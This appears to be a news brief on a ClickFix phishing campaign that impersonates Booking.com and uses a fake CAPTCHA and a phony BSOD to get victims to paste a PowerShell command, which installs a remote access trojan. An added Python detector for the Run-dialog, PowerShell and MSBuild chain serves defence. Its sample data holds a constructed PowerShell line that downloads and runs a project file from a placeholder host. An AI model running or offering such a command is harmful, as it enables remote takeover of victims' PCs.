Watch out! This fake Windows BSOD is a trap
Briefly

"The Windows Blue Screen (or Black Screen) of Death is typically a sign that some unrecoverable error or conflict has occurred. In a new malware campaign tracked by cybersecurity firm Securonix, attackers are using ClickFix social engineering, fake CAPTCHAs, and phony BSODs to convince victims into copying and pasting malicious code. Once executed, the code deploys a Russian-linked RAT (remote access trojan) that allows the criminals to remotely take over the PC and deploy additional malware."
"The attack starts with a phishing email that contains a link to a fake website masquerading as online travel agency Booking.com. The email ostensibly includes a request to cancel a booking reservation to convince the recipient to engage with it. Selecting the link to the site displays a page with a fake CAPTCHA prompt that then triggers the phony BSOD."
"From there, the campaign turns to an infamous ClickFix tactic, which aims to trick people into infecting themselves by copying and pasting code or launching certain commands on their system. In this case, the recipient is told to fix the BSOD by copying and pasting a malicious script into the Windows run dialog box. Falling for the ClickFix tactic runs a PowerShell command that downloads and runs an MSBuild project file named v.proj."
A phishing campaign impersonating Booking.com targets hotel and hospitality industry recipients with a bogus cancellation link. The fake site shows a CAPTCHA that triggers a phony BSOD, then instructs victims to copy and paste a "fix" script into the Windows Run dialog. Executing the script runs a PowerShell command that downloads and executes an MSBuild project file named v.proj. The payload is a Russian-linked remote access trojan that grants remote control of the infected PC and enables deployment of additional malware. The multi-stage infection chain is tracked as PHALT#BLYX and leverages layered social engineering to escalate access.
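The process chain described above (Run dialog, then a PowerShell download, then MSBuild on a project file) can be hunted for in process-creation telemetry. The following Python is an added example, not code from Securonix or ZDNET; the event field names, the matching heuristics and the sample events are assumptions, and the sample data is constructed.

```python
import ntpath
import re

# Heuristics (assumptions): download keywords in a PowerShell command line,
# and a .proj argument (not .csproj/.vbproj) passed to MSBuild.
DOWNLOAD_HINT = re.compile(r"https?://|invoke-webrequest|\biwr\b|downloadfile|downloadstring", re.I)
PROJ_ARG = re.compile(r"\.proj\b", re.I)

def name(path):
    return ntpath.basename(path).lower()

def find_clickfix_chains(events):
    """Return MSBuild launches descending from a PowerShell download started under explorer.exe."""
    by_pid = {e["pid"]: e for e in events}  # PID reuse is ignored in this example
    # Commands typed into the Run dialog start as children of explorer.exe.
    suspects = {
        e["pid"] for e in events
        if name(e["image"]) in ("powershell.exe", "pwsh.exe")
        and name(by_pid.get(e["ppid"], {}).get("image", "")) == "explorer.exe"
        and DOWNLOAD_HINT.search(e["cmd"])
    }
    findings = []
    for e in events:
        if name(e["image"]) != "msbuild.exe" or not PROJ_ARG.search(e["cmd"]):
            continue
        pid, seen = e["ppid"], set()
        while pid in by_pid and pid not in seen:  # walk up the ancestry
            if pid in suspects:
                findings.append({"powershell_pid": pid, "msbuild_pid": e["pid"], "msbuild_cmd": e["cmd"]})
                break
            seen.add(pid)
            pid = by_pid[pid]["ppid"]
    return findings

# Constructed process-creation events (Sysmon Event ID 1 style), not captured from the campaign.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 5000, "ppid": 1200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell -c "iwr https://example.invalid/v.proj -OutFile $env:TEMP\v.proj; ..."'},
    {"pid": 5100, "ppid": 5000, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmd": r"MSBuild.exe C:\Users\user\AppData\Local\Temp\v.proj"},
    # Benign: interactive PowerShell with no download, building a local project.
    {"pid": 8000, "ppid": 1200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe"},
    {"pid": 8100, "ppid": 8000, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmd": r"MSBuild.exe C:\src\build.proj"},
]

if __name__ == "__main__":
    for finding in find_clickfix_chains(SAMPLE_EVENTS):
        print(finding)
```

Because shortcuts and other shell launches also run under explorer.exe, a match is a lead for triage rather than proof that the Run dialog was used.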
Read at ZDNET